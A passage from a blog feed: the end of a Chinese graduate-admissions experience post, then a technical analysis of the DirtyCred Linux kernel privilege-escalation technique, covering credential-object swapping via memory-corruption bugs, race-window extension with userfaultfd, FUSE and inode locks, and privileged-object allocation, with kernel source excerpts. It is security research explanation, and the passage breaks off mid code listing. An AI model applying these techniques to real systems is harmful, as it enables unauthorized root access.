ipads）。收的人越少，在没提前联系导师的情况下就越进不去。</p></li><li><p><strong>鸽导师慎重</strong>，尤其是同领域内的导师。我在整个夏令营阶段套的导师不多，只有五位。但是这五位导师真就相互认识，有些甚至是很好的朋友，我联系的导师几乎每个都问过我一遍你为啥不冲一下清华…因此最好在和导师聊的时候，实诚一点，让导师知道你可能不来的想法，提前打好预防针，同时也让老师知道你的难处。</p><p>当然，这点仁者见仁智者见智，有些同学鸽导师真是一个比一个狠…对于自己的发展来说，也不能说是做的不对，只能说还是得根据自身情况和导师角度来考虑。同时也为自己的学弟学妹们考虑，<strong>最好别用本校下届学子的福禄来为自己的前途铺路</strong>。</p></li></ul><blockquote><p>总结：套磁<strong>进组实习</strong> <strong>&gt;&gt;</strong> 科研经历与产出 &gt; 项目经历 &gt;= 竞赛经历 &gt;= <strong>大厂</strong>实习经历。</p><p>事实上面试的时候还挺多导师问我关于腾讯实习的经历。</p></blockquote><h2 id="四、预推免">四、预推免</h2><p>预推免的处境会比夏令营更难！整体上来看，大部分学校（包括中九那些）预推免的 bar 都会提高，可能之前夏令营是 rank 5% 能进，那预推免就会到 3% 了。预推免招的大部分都是 waiting list，老师收的大部分还是夏令营的营员。不过好在有一门<strong>国三</strong>水奖在预推免之前出结果了，同时绩点又上去了 0.01，因此我的处境稍微好些。</p><p>预推免时目前有了人大信院学硕和中科大学硕（武大被我放掉了，预推免系统没填）。由于人大 seclab 老师做的方向和我也很贴切，同时人大地理位置非常优越（北京四环以内），因此除了清北以外，人大 offer 对我来说应该算是最优解了，所以在预推免时就简单冲击其他华五学校的夏令营。这里稍微点一下华五学校的预推免情况：</p><ul><li><p>人大：信院没有预推免。</p></li><li><p>南大：参加了夏令营就不准再参加预推免，但是预推免系统还是要填的。</p></li><li><p>复旦：主要的名额都在预推免，不过那里的导师和我做的方向还是不太搭。</p></li><li><p>浙大CS网安：21年学硕只有25个，其中13个本校生，个人感觉竞争<strong>不是一般的激烈</strong>。</p></li><li><p>上交：预推免基本上是<strong>直博生</strong>以及<strong>面向本校</strong>的推免，外校硕士<strong>毫无机会</strong>。</p><p>上交直博只要提前联系导师就好，超级好进。</p></li><li><p>中科大：<s>网安貌似没有预推免了</s> 本来以为没开，结果还真再开一批。</p></li></ul><p>清深（清华深圳研究院）和北深（北大信工）里面的老师，几乎全都是与大数据和人工智能相关，因此那边的老师对我的履历并不感兴趣（我做的东西和他们看中的完全不沾边），唯二和安全沾边的老师又上了研控网（懂得都懂）。在套不到导师的情况下，清深和北深在预推免基本上是没有机会的，因为大部分机会都在夏令营发放完了（我两个都没入营，笑），就算有鸽子也轮不到我候补。</p><p>北大系统一次性可以同时填报多个院系，但是北大每个院的 offer 也几乎完全在夏令营阶段发完了。预推免狂套 pkucs 导师，冲北大计算机主要是看能不能收留心碎被鸽导师（笑），不过看上去貌似是一点效果也没有，想上北大的还是得<strong>极度重视</strong>夏令营阶段。</p><p>那么这样以来，我预推免要冲的院系只剩下几个可选项了：</p><ol><li>浙江大学CS网络空间安全学院</li><li>复旦大学计算机系</li><li>北大软微 or CS</li><li>清华大学网络科学与网络空间研究院，简称清华网研院。</li></ol><p>首先是浙大。浙大今年 bar 巨高，一片拒信。外校生入场的可能只有两位数，网安那边据我所了解只有大概 50 来号人入了（包括本校和外校）。我也被拒掉了，可能是因为背景一般般吧，因为我看到有一个同水平但是 title 比我好很多的同学入了。</p><p>其次是复旦。复旦今年开的比较晚，大体上感觉预推免入的和夏令营入的还是同一批人，夏令营能进的预推免就能进，夏令营进不了的预推免还是进不了。我拿到了梦校的 offer 就把它鸽了，没再参与后面的面试流程。</p><p>之后是北大。北大虽然软微和 CS 都开了预推免，但是实际上并不收人，老师们已经在夏令营中被瓜分的差不多了，预推免基本上就相当于在招 waiting list，没有导师接收的话等于没戏。</p><p>最后是，<strong>清华网研院</strong>。</p><p>清华网研院，是我花了最多心思的目标院校，同时那里也有着我最想跟着一起搞研究的牛导，这里是我的<strong>最终目标</strong>，前面的一切夏令营+预推免活动都是在<strong>找保底院校</strong>。我在去年12月份便联系了导师，之后从寒假开始下半个学期一直在远程实习，实习了有大半年之久。在实习期间，我写过代码、辅助撰写过论文、逆向驱动等等，做研究的生活还挺充实的；而且在实习的过程中也确实感觉到组内氛围相当不错，这也加大了我想进组研究的意愿。</p><p>这里不得不提一句夏令营，夏令营招收 50 位学生，可能是材料和背景上的不足，竟然没有入营。后来了解到这个夏令营主要招直博生，直硕生招的少，这让我的心稍微宽慰了一点。</p><p>预推免进复试的共 75 个学生，只比夏令营多了25个，其中一半本校一半外校。本校和本校竞争，外校和外校竞争，学院招生名额对半分。这次外校直博有12人，直硕生有25人。外校生硕士名额是10个，25 进 10 稍微还是有点压力。</p><p>网研院的机考和计算机系、深研院是同一套的，这三个院系同一时间考同一套题，因此机考题不会太简单。这次预推免的题目不怎么偏向算法，以至于我苦练洛谷三个月最后愣是一点没用…不过自己还是考的比较差劲，只拿到了送的几个得分点。机考完后一直觉得自己考的巨差无比，尤其是今年机考成绩从 10% 变成了 20%，占比增大，机考的重要性翻倍。但是后来了解到机考成绩比我想象的要好，感觉又充满了希望。</p><p>面试细节就不过多描述了，学院官网上公示了考核方式，分为综合面试 8 分钟和专业面试 12 分钟，感兴趣的可以去看看。需要注意的是，在投递 top2 时，各类文书（例如个人陈述、PPT 等）一定要精雕细磨，因为老师<strong>真的会翻来覆去的看你的文书材料</strong>…我在面试时看到底下一群老师在翻来翻去的看个人陈述，感到有一丝丝的害怕，深怕哪里翻车了…</p><p>最后感谢各位一直在支持着我的老师同学以及学长学姐们：</p><p><img src="/2022/11/baoyan-note/image-20220919134202687.png" alt="image-20220919134202687"></p><h2 id="五、鸽子">五、鸽子</h2><p>这里提几句鸽子情况。</p><ol><li>上交 ipads 实验室。在清华网研院出结果（<strong>9月19日</strong>）以后发了个邮件询问了一下自己的替补排名，从原先的<strong>替补第六</strong>上升到<strong>替补第二</strong>，在<strong>9月25日</strong>收到了教务秘书的专硕递补电话。感觉上交鸽子也是很多的（虽然我也要鸽了，笑）。今年上交软院也有企业联培计划，工程硕士也是一年校内两年企业培养。</li><li>南大 928 直接鸽到候补 200 多（好像是），有志于南大的候补要求<strong>直接进行系统填报</strong>，在候补时<strong>优先候补这些填报系统的同学</strong>，而<strong>不是候补排名靠前但没填报系统的同学</strong>。在算上填报系统的候补同学后，如果招生名额还有空缺就会开始打电话。我候补80就在 928 那天被打了；室友貌似候补200名，928那天和南大招生办打了好几个电话，极限上岸（祝贺）。</li></ol>]]></content>
    
    
    <summary type="html">&lt;h2 id=&quot;一、简介&quot;&gt;一、简介&lt;/h2&gt;
&lt;p&gt;这里记录着本人 2022 年秋季保研求学的经历。&lt;/p&gt;
&lt;p&gt;考虑到各个院校的保密需求，这篇经验帖在推免生填报系统关闭后的一段时间发布。&lt;/p&gt;</summary>
    
    
    
    
  </entry>
  
  <entry>
    <title>浅析 Linux Dirty Cred 新型漏洞利用方式</title>
    <link href="https://kiprey.github.io/2022/10/dirty-cred/"/>
    <id>https://kiprey.github.io/2022/10/dirty-cred/</id>
    <published>2022-10-05T16:00:00.000Z</published>
    <updated>2025-11-24T03:59:39.985Z</updated>
    
    <content type="html"><![CDATA[<h2 id="一、简介">一、简介</h2><p>Linux Dirty Cred 是一种基于 Dirty Pipe 漏洞所创新出来的新型<strong>漏洞利用方式</strong>。通过 Dirty Cred 的这种利用流程，其他位于 <strong>Linux 内核</strong>中的一些<strong>内存漏洞</strong>，在对其进行漏洞利用的过程里，可以转换为<strong>逻辑漏洞</strong>，来<strong>绕过当前所有的内核缓解机制</strong>（包括 CFI 控制流完整性保护）。</p><p>Dirty Cred 的核心利用思路是<strong>使用高权限 credential 对象来交换低权限 credential 对象</strong>，从而达到提权的目的。该论文目前已中 CCS 2022 &amp; Black Hat USA 2022，属实是一个比较有趣的思路。</p><span id="more"></span><h2 id="二、背景介绍">二、背景介绍</h2><p>在讲述 Dirty Cred 前，需要做一些背景介绍来帮助理解。</p><h3 id="1-Dirty-Pipe">1. Dirty Pipe</h3><p>Linux Dirty Pipe CVE-2022-0847 是今年早些时候爆发出来的一个 Linux 内核提权漏洞。我曾在上半年写过一篇分析它的文章 - <a href="https://kiprey.github.io/2022/04/dirty-pipe/">Linux Dirty Pipe CVE-2022-0847 漏洞分析 - Kipre’s Blog</a>，因此就不在这里赘述了。</p><p>简单概括一下成因：</p><p>Pipe 结构是由一个环形队列组成，其中队列元素分别为<strong>实际存放数据的物理页</strong>的引用。对于某次 pipe 的写入操作，如果 pipe <strong>队列头所在元素上的标志位</strong>为 <strong>PIPE_BUF_FLAG_CAN_MERGE</strong>，那就说明这次写入的数据<strong>可以直接合并</strong>至队列头的物理页里，无需重新创建新队列元素，减少内存占用。</p><p>Linux 中存在一个称为 <strong>splice</strong> 的系统调用，它可以直接将文件中的数据追加进某个 pipe 中。其本质原理是将该文件的<strong>页面缓存</strong>引用直接添加进 pipe 的队列头部。由于文件页面缓存可能用在多个地方，因此这些页面缓存在 pipe 队列中元素上的标志位就<strong>不能标注</strong> <strong>PIPE_BUF_FLAG_CAN_MERGE</strong>，以便于防止在向 pipe 写入新数据时，错误地把新数据与页面缓存上的数据合并，对页面缓存进行误修改。</p><p>由于 Dirty Pipe 漏洞的根源是 <strong>pipe 队列元素上标志位的未初始化漏洞</strong>，恶意黑客可以先往 pipe 内使用 write 函数灌注大量数据，使得 pipe 队列上的每个元素标志位都标有 <strong>PIPE_BUF_FLAG_CAN_MERGE</strong>，再紧接着 read 出这些数据，将 pipe 清空，并之后使用 splice 系统调用将任意可读文件（例如 <code>/etc/passwd</code>）的页面缓存加载进 pipe 中。但 pipe 队列元素上的<strong>标志位并没有被重置</strong>，因此对于加载进 pipe 中的页面缓存元素，每个队列元素上的标志位都将残留先前所设置的 <strong>PIPE_BUF_FLAG_CAN_MERGE</strong>，这样一来后续的 write 便可直接<strong>污染</strong>本不该被修改的文件页面缓存，使得特权文件（例如 <code>/etc/passwd</code>）在内存中的数据被<strong>篡改</strong>，造成提权。</p><p>有意思的是，整个漏洞利用流程<strong>完全不涉及各类缓解机制</strong>。Dirty Pipe 是一个彻头彻尾的<strong>逻辑漏洞</strong>，这类逻辑漏洞可以完全绕过缓解机制，从而进行提权等操作。但 Dirty Pipe 又<strong>高度依赖 pipe 本身的能力</strong>（那种可以通过 pipe 将数据注入进任意文件的能力），换句话说即逻辑漏洞因为是<strong>逻辑</strong>错乱导致的问题，自然漏洞利用就必须与这个<strong>功能部件相关的逻辑</strong>高度关联。由于逻辑漏洞在相关逻辑的关联性较强，因此漏洞可以被非常容易地防护，影响范围并不会特别广。</p><h3 id="2-Credentials">2. Credentials</h3><p>Linux 的 Credentials，通常将其认为是内核中<strong>用于存放特权信息的内核属性</strong>。我们所熟知的 Credentials 有两种（总数不止两种）：</p><ol><li><p><code>struct cred</code>：其中存放了一个 task 的权限信息，例如 GID、UID 等等。如果能任意修改一个低权限进程的 cred 结构体，那么我们就可以将该进程提权至高权限（例如 root）。</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// include\linux\cred.h</span></span><br><span class="line"><span class="keyword">struct</span> <span class="title class_">cred</span> &#123;</span><br><span class="line"> <span class="type">atomic_t</span>    usage;</span><br><span class="line"><span class="meta">#<span class="keyword">ifdef</span> CONFIG_DEBUG_CREDENTIALS</span></span><br><span class="line"> <span class="type">atomic_t</span>    subscribers;    <span class="comment">/* number of processes subscribed */</span></span><br><span class="line"> <span class="type">void</span>        *put_addr;</span><br><span class="line"> <span class="type">unsigned</span>    magic;</span><br><span class="line"><span class="meta">#<span class="keyword">define</span> CRED_MAGIC   0x43736564</span></span><br><span class="line"><span class="meta">#<span class="keyword">define</span> CRED_MAGIC_DEAD  0x44656144</span></span><br><span class="line"><span class="meta">#<span class="keyword">endif</span></span></span><br><span class="line"> <span class="type">kuid_t</span>      uid;        <span class="comment">/* real UID of the task */</span></span><br><span class="line"> <span class="type">kgid_t</span>      gid;        <span class="comment">/* real GID of the task */</span></span><br><span class="line"> <span class="type">kuid_t</span>      suid;       <span class="comment">/* saved UID of the task */</span></span><br><span class="line"> <span class="type">kgid_t</span>      sgid;       <span class="comment">/* saved GID of the task */</span></span><br><span class="line"> <span class="type">kuid_t</span>      euid;       <span class="comment">/* effective UID of the task */</span></span><br><span class="line"> <span class="type">kgid_t</span>      egid;       <span class="comment">/* effective GID of the task */</span></span><br><span class="line"> <span class="type">kuid_t</span>      fsuid;      <span class="comment">/* UID for VFS ops */</span></span><br><span class="line"> <span class="type">kgid_t</span>      fsgid;      <span class="comment">/* GID for VFS ops */</span></span><br><span class="line"> <span class="type">unsigned</span>    securebits; <span class="comment">/* SUID-less security management */</span></span><br><span class="line"> <span class="type">kernel_cap_t</span>    cap_inheritable; <span class="comment">/* caps our children can inherit */</span></span><br><span class="line"> <span class="type">kernel_cap_t</span>    cap_permitted;   <span class="comment">/* caps we&#x27;re permitted */</span></span><br><span class="line"> <span class="type">kernel_cap_t</span>    cap_effective;   <span class="comment">/* caps we can actually use */</span></span><br><span class="line"> <span class="type">kernel_cap_t</span>    cap_bset;        <span class="comment">/* capability bounding set */</span></span><br><span class="line"> <span class="type">kernel_cap_t</span>    cap_ambient;     <span class="comment">/* Ambient capability set */</span></span><br><span class="line">    ...</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure></li><li><p><code>struct file</code>： 存放一个文件的部分权限信息，例如 read &amp; write 权限等。如果一个低权限用户可以任意修改高权限文件（例如 /etc/passwd），那么同样也能造成提权的目的。</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// include\linux\fs.h</span></span><br><span class="line"><span class="keyword">struct</span> <span class="title class_">file</span> &#123;</span><br><span class="line"> ...</span><br><span class="line"> <span class="keyword">struct</span> <span class="title class_">path</span>    f_path;</span><br><span class="line"> <span class="keyword">struct</span> <span class="title class_">inode</span>        *f_inode;   <span class="comment">/* cached value */</span></span><br><span class="line"> <span class="type">const</span> <span class="keyword">struct</span> <span class="title class_">file_operations</span>    *f_op;</span><br><span class="line"></span><br><span class="line"> <span class="comment">/*</span></span><br><span class="line"><span class="comment">  * Protects f_ep_links, f_flags.</span></span><br><span class="line"><span class="comment">  * Must not be taken from IRQ context.</span></span><br><span class="line"><span class="comment">  */</span></span><br><span class="line"> <span class="type">spinlock_t</span>          f_lock;</span><br><span class="line"> <span class="keyword">enum</span> <span class="title class_">rw_hint</span>        f_write_hint;</span><br><span class="line"> <span class="type">atomic_long_t</span>       f_count;</span><br><span class="line"> <span class="type">unsigned</span> <span class="type">int</span>        f_flags;</span><br><span class="line"> <span class="type">fmode_t</span>             f_mode;           <span class="comment">// !!: O_RDWR</span></span><br><span class="line"> <span class="keyword">struct</span> <span class="title class_">mutex</span>        f_pos_lock;</span><br><span class="line"> <span class="type">loff_t</span>              f_pos;</span><br><span class="line"> <span class="keyword">struct</span> <span class="title class_">fown_struct</span>  f_owner;</span><br><span class="line"> <span class="type">const</span> <span class="keyword">struct</span> <span class="title class_">cred</span>   *f_cred;      <span class="comment">// !!: cred</span></span><br><span class="line"> <span class="keyword">struct</span> <span class="title class_">file_ra_state</span>   f_ra;</span><br><span class="line"> ...</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><p>需要注意的是，struct file 只保存<strong>已被打开</strong>文件的信息。如果某个文件连打开的权限都没有，那自然就不可能会有对应的 struct file 结构体。</p><p>至于文件的属主等其他特权信息，则存放在 <code>struct inode</code> 中，这里不再赘述。</p></li></ol><h3 id="3-Allocator">3. Allocator</h3><p>众所周知，Linux 内核主要使用 slab 分配器来进行内存分配。slab 分配器中主要维护了两种内存缓存（即可以理解成两套作用不同的内存分配方式）：</p><ol><li>dedicated cache: 这里的内存是用于分配给<strong>内核中的常用对象</strong>。在该缓存中被分配的结构体将始终保持初始化状态，以便于提高分配速度。</li><li>generic cache: 通用缓存。大多数情况下其内存块的大小与 2 的幂次方对齐。</li></ol><p>这类 cred 和 file 结构体等 credential 对象都是在 dedicated cache 中分配，而大多数内存漏洞发生的地方都是在 generic cache 中。</p><p>可以在终端中键入 <code>sudo cat /proc/slabinfo</code> 来查看 slab 分配器的具体信息。其中这些名字互不相同的内存块即 dedicated cache：</p><p><img src="/2022/10/dirty-cred/image-20221006192115747.png" alt="image-20221006192115747"></p><p>后面那些名称中带有 kmalloc 的即 generic cache：</p><p><img src="/2022/10/dirty-cred/image-20221006192309397.png" alt="image-20221006192309397"></p><h2 id="三、威胁模型">三、威胁模型</h2><ul><li><p>攻击者层面</p><ul><li>低权限用户可以接触访问目标 Linux 系统</li><li>已经存在一个堆破坏的内存漏洞</li><li>打算使用该漏洞进行本地提权</li></ul><blockquote><p>不考虑硬件对漏洞利用所带来的帮助。</p></blockquote></li><li><p>被攻击平台层面</p><ul><li>启用<strong>所有缓解机制</strong>（例如 KASLR, SMAP, SMEP, CFI, KPTI）</li></ul></li></ul><h2 id="四、面对的挑战">四、面对的挑战</h2><p>先简单介绍一下 CVE-2021-4154， 来说明 Dirty Cred 是如何利用的，先上一张图：</p><p><img src="/2022/10/dirty-cred/image-20221006195145289.png" alt="image-20221006195145289"></p><p>其实看图也能大致看出来是什么样的过程。太长不看版本就是，写入一个文件需要顺序执行：</p><ol><li>文件权限检查（是否可写）</li><li>开始实际写入数据至文件</li></ol><p>如果在这两个步骤之中进行<strong>竞争</strong>，在成功检查文件权限后（/tmp/x 可写），触发漏洞恶意将原先的 credential 结构体（这里是 file 结构体）<strong>释放</strong>，并<strong>创建</strong> <strong>高权限</strong>的 credential 结构体（例如<code>/etc/passwd</code> 的 file 结构体）来<strong>占据</strong>这个内存空洞，那么待写入的数据就会被写入进 /etc/passwd 中，造成本地提权。</p><p>那么 Dirty Cred 所面对的挑战其实也可以看得出来：</p><ol><li>如何将<strong>内存破坏漏洞</strong>，转换为能够<strong>置换 credential object</strong> 的原语。</li><li>如何延长文件的<strong>权限检查- 数据写入</strong>的竞争窗口。</li><li>如何创建高权限的 credential object，来占据先前被释放的低权限 credential object 内存空洞。</li></ol><h2 id="五、-置换-credential-object">五、 置换 credential object</h2><p>内存破坏漏洞常见的种类有：</p><ol><li>Invalid-Write: <strong>Out Of Bound Write</strong> (Read 肯定没法利用了，只能泄露数据)、以及 <strong>Use after Free</strong>。</li><li>Invalid-Free: <strong>Double Free</strong></li></ol><p>接下来将分别说明如何利用这几种内存漏洞，来达到<strong>使用 privileged credential 置换 unprivileged credential</strong> 的目的。</p><h3 id="1-Out-Of-Bound-Write">1.  Out Of Bound Write</h3><p>太长不看，直接看图：</p><p><img src="/2022/10/dirty-cred/image-20221006203908551.png" alt="image-20221006203908551"></p><p>还是常规的 OOB write 的利用操作：尝试越界写入下一个结构体的字段，将该结构体原先指向<strong>低权限 credential 结构体指针</strong>被修改为<strong>指向高权限 credential 结构体指针</strong>。这种修改指向的方法是通过往指针<strong>低两个字节</strong>写入0（即 0x0000）来进行的，之所以是写两个字节的 0 而不是其他的，是因为攻击者希望把原指针修改为<strong>当前页所在首部的 privileged credentials</strong>。攻击者可以通过频繁创建 privileged credentials 对象来占据新页面的首部位置，为后续修改指针做准备。<br>由于页面以 0x1000 字节对齐，而写入两个字节的 0 要求 privilege credential 所在的地址以 0x1<strong>0</strong>000 字节对齐，因此可能需要以 1/16 的概率进行爆破才能利用成功。</p><h3 id="2-Use-After-Free">2. Use After Free</h3><p>UAF 和先前介绍的 CVE-2021-4154 漏洞利用流程差不多。</p><ol><li>如果 UAF 的地方在 credential dedicated cache上，那只需释放掉原先的 unprivileged credential，使用新创建的 privileged credential 对象来占据这个内存空洞，即可完成置换。</li><li>如果 UAF 的地方在 generic cache 上（大多数情况），那就<strong>要求这个 UAF 漏洞拥有 invalid-write 的能力</strong>。即先释放出一个内存空洞，使用一个带有 credential pointer 的可利用对象来占据这个内存空洞，然后利用 UAF 悬垂指针来改这个 credential pointer 即可。</li></ol><h3 id="3-Double-Free">3. Double Free</h3><p>Double Free 的利用略显复杂，先上图：</p><p><img src="/2022/10/dirty-cred/image-20221006220306654.png" alt="image-20221006220306654"></p><p>利用流程大致是：</p><ol><li><p>在 <strong>vulnerable object 所在的 cache</strong> 中，大量分配对象，使得</p><ol><li>这些所分配的对象，其释放时机可控</li><li>“大量分配对象” 的这个<strong>大量</strong>，是要分配至少一个页面的内存空间。</li></ol><p>这么做的目的只有一个：<strong>使某个内存页面的被回收时机可控</strong>。因为如果这个页面上的所有对象全部释放，那么该空闲页面自然就会被回收。</p></li><li><p>尝试触发两次 double free 漏洞，使得最终<strong>某个被释放内存块上有两个悬垂指针</strong>。</p></li><li><p>释放该 vulnerable object 所在页面上的所有对象，使得该页面被回收进分配器中，并被用于 credential 的内存分配（即成为 dedicated cache）</p></li><li><p>在这块已经成为 credential dedicate cache 的内存页面上大量分配 credential 结构体，占据该页面的内存空间（即 <strong>Figure 3(f)</strong>）。</p></li><li><p>注意到两个悬垂指针可能不会与 credential object 对齐，因此需要用掉一个悬垂指针来释放出一块 credential object 的内存空洞出来。</p></li><li><p>分配新 credential object，占据这个内存空洞。这样就可以达到<strong>两个指针共同指向一个 credential object</strong> 的效果，后续的利用就可参照 UAF 的方式来进行，这里就不再赘述了。</p></li></ol><p>这里有个有趣的问题：一个<strong>原先指向 generic cache</strong> 的指针，如果这个指针所指向内存变更为 <strong>dedicated cache</strong>，那么后续对这个以为是 generic pointer 实则是 dedicated pointer 进行 free 操作时，这个 free 的大小是如何界定的？为什么 free 的大小是 credential object 的大小呢？</p><p>通过查阅 slab 分配器的 kfree 逻辑，发现它的释放逻辑与被释放地址高度相关。首先会尝试根据被释放地址获取其对应的 slab_cache 结构，然后再根据结构中所存放的信息来释放对应的 object size。换句话说，如果 kfree 释放的地址在 generic cache中，那就会走 generic cache 的释放逻辑；如果是在 dedicated cache 中，那就会走 dedicated cache 的释放逻辑。这么做或许是为了提高可用性，使得释放两个不同 cache 的内存块可以使用同一个 kfree 接口。</p><h2 id="六、延长竞争窗口">六、延长竞争窗口</h2><p>Dirty Cred 需要在<strong>检查文件写权限 - 实际写入数据</strong> 这两步之中，成功将低权限 credential 替换为高权限 credential。由于 credential 的替换需要一些时间，因此如果能延长这个竞争窗口，那就能非常成功的进行漏洞利用。</p><h3 id="1-有趣的机制">1. 有趣的机制</h3><p>这里需要先介绍两个有趣的机制，分别是 <strong>Userfaultfd</strong> 和 <strong>FUSE</strong>，这两种机制都<strong>允许用户无限延长竞争窗口</strong>。</p><h4 id="a-Userfaultfd">a. Userfaultfd</h4><p>在多线程程序中，userfaultfd 允许一个线程管理其他线程所产生的 Page Fault 事件。当某个线程触发了 Page Fault，该线程将<strong>立即陷入 sleep</strong>，而其他线程则可以通过 userfaultfd 来读取出这个 Page Fault 事件，并进行处理。</p><p>Userfaultfd 常用于条件竞争漏洞利用中。但悲伤的是，为了防止 userfaultfd 在内核漏洞利用中的滥用，在内核 5.11 版本开始，<strong>非特权</strong>的 userfaultfd <strong>默认是禁用的</strong>（<a href="https://lwn.net/Articles/819834/">LWN: Blocking userfaultfd() kernel-fault handling</a>）。</p><blockquote><p>参考：Linux Manual Page（<code>man userfaultfd</code>）。</p></blockquote><h4 id="b-FUSE">b. FUSE</h4><p>FUSE 是一个用户层文件系统框架，允许用户实现自己的文件系统。用户可以在该框架中注册 handler，来指定应对文件操作请求。这样一来便可以在实际操作文件之前，执行 handler 暂停内核执行，尽可能地延长窗口。</p><h3 id="2-Userfaultfd-利用方式">2. Userfaultfd 利用方式</h3><p>在 Linux 4.13 之前，<strong>系统调用 writev</strong>  的实现大致如下：</p><p><img src="/2022/10/dirty-cred/image-20221006234319329.png" alt="image-20221006234319329"></p><p>攻击者可以在权限检查执行完成后，在调用 <code>import_iovec</code> 时触发缺页错误，从而利用 userfaultfd 机制来暂停内核的执行。</p><p>但在 linux 4.13 版本之后，该函数的实现变成了如下，即将 import_iovec 函数的调用提前了：</p><p><img src="/2022/10/dirty-cred/image-20221006234539132.png" alt="image-20221006234539132"></p><p>这就使得刚刚所说的利用方法不再有效，需要换一种方式。</p><p>由于 Linux 中文件系统是以多层形式实现，即高层接口调用底层函数来实现操作，因此在写入文件数据时，最终都会调用到一个称为 <code>generic_perform_write</code> 的函数，该函数中会主动触发一次 Page Fault，同样可以利用 userfaultfd 来实现利用：</p><p><img src="/2022/10/dirty-cred/image-20221006235624520.png" alt="image-20221006235624520"></p><h3 id="3-文件系统-lock-的利用方式">3. 文件系统 lock 的利用方式</h3><p>以 ext4 文件系统的数据写入为例，可以看到在执行 <code>generic_perform_write</code> 函数进行实际的数据写入之前，都需要对 inode 进行一次上锁（即 <code>inode_lock(inode)</code> 调用）：</p><p><img src="/2022/10/dirty-cred/image-20221007000247163.png" alt="image-20221007000247163"></p><p>如果有一个进程率先对某个文件进行<strong>超大量数据写入</strong>，那么另一个进程在对相同文件执行写入操作时，将会一直等待 inode 锁的释放。通过测试可知，4GB 数据的写入可以使得后一个进程等待数十秒（取决于硬盘性能），因此这个 inode 锁同样可以延长竞争窗口。</p><h2 id="七、分配特权对象">七、分配特权对象</h2><p>由于 Dirty Cred 十分需要控制 privilege credential 对象的分配时机，控制该对象的分配成为了一个关键点。</p><p>在<strong>用户层</strong>中，有两种方法可以分配 privilege credential:</p><ol><li>大量执行 Set-UID 程序（例如 sudo），或者频繁创建特权级守护进程（例如 sshd），从而创建 privilege cred 结构体。</li><li>使用 ReadOnly 方式来打开诸如 <code>/etc/passwd</code> 等特权文件。</li></ol><p>在<strong>内核层</strong>中，当内核创建新的 kernel thread 时，当前 kernel thread 将会被复制，于此同时其 privileged cred 结构体也会被拷贝一份。因此只要能找到稳定创建 kernel thread 的方式，Dirty Cred 就能稳定地创建 privileged cred 结构体。有两种方法可以做到这点：</p><ol><li><p>往 kernel workqueue 中填充大量任务，动态创建新的 kernel thread 来执行任务。</p></li><li><p>调用 usermode helper （一种允许内核创建用户模式进程的机制），一种最常见的应用场所是加载内核模块至内核空间中。</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// kernel\kmod.c</span></span><br><span class="line"><span class="function"><span class="type">static</span> <span class="type">int</span> <span class="title">call_modprobe</span><span class="params">(<span class="type">char</span> *module_name, <span class="type">int</span> wait)</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line"> <span class="keyword">struct</span> <span class="title class_">subprocess_info</span> *info;</span><br><span class="line"> <span class="type">static</span> <span class="type">char</span> *envp[] = &#123;</span><br><span class="line">     <span class="string">&quot;HOME=/&quot;</span>,</span><br><span class="line">     <span class="string">&quot;TERM=linux&quot;</span>,</span><br><span class="line">     <span class="string">&quot;PATH=/sbin:/usr/sbin:/bin:/usr/bin&quot;</span>,</span><br><span class="line">     <span class="literal">NULL</span></span><br><span class="line"> &#125;;</span><br><span class="line"></span><br><span class="line"> <span class="type">char</span> **argv = <span class="built_in">kmalloc</span>(<span class="built_in">sizeof</span>(<span class="type">char</span> *[<span class="number">5</span>]), GFP_KERNEL);</span><br><span class="line"> <span class="keyword">if</span> (!argv)</span><br><span class="line">     <span class="keyword">goto</span> out;</span><br><span class="line"></span><br><span class="line"> module_name = <span class="built_in">kstrdup</span>(module_name, GFP_KERNEL);</span><br><span class="line"> <span class="keyword">if</span> (!module_name)</span><br><span class="line">     <span class="keyword">goto</span> free_argv;</span><br><span class="line"></span><br><span class="line"> argv[<span class="number">0</span>] = modprobe_path;</span><br><span class="line"> argv[<span class="number">1</span>] = <span class="string">&quot;-q&quot;</span>;</span><br><span class="line"> argv[<span class="number">2</span>] = <span class="string">&quot;--&quot;</span>;</span><br><span class="line"> argv[<span class="number">3</span>] = module_name;  <span class="comment">/* check free_modprobe_argv() */</span></span><br><span 